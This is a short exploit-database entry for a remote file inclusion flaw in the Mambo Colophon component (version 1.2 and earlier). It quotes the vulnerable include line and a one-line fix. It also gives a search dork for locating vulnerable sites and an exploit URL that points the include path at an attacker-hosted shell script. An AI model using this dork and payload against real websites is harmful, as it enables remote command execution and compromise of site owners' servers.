[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Mambo Colophon Component <= 1.2 Remote Inclusion Vulnerability

Author
Drago84
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-615
Category
web applications
Date add
28-07-2006
Platform
unsorted
==============================================================
Mambo Colophon Component <= 1.2 Remote Inclusion Vulnerability
==============================================================




###########  Command Mambo Colophon =<1.2 ##by #Drago84#########

      Found By Drago84
Exclusive Security Italian Security

  This bug allows a remote atacker to execute commands via rfi

page:
  admin.colophon.php

bug:
 require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php");

path:
add in admin.colophon.php
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );

dork: inurl:com_colophon

expl:
htttp:/www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?




#  0day.today [2024-12-25]  #